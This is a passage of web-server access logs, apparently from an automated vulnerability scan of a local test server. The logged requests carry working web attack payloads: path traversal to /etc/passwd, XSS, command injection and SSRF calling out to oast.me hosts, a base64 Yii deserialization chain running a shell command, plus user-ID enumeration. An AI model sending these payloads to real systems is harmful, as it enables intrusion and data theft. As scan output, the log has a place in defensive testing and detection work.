/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20c9v8ia8smpv8c8qg07h0wrr7u6ke51jw7.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://c9v8ia8smpv8c8qg07h0h6tnq76cnn6j3.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; 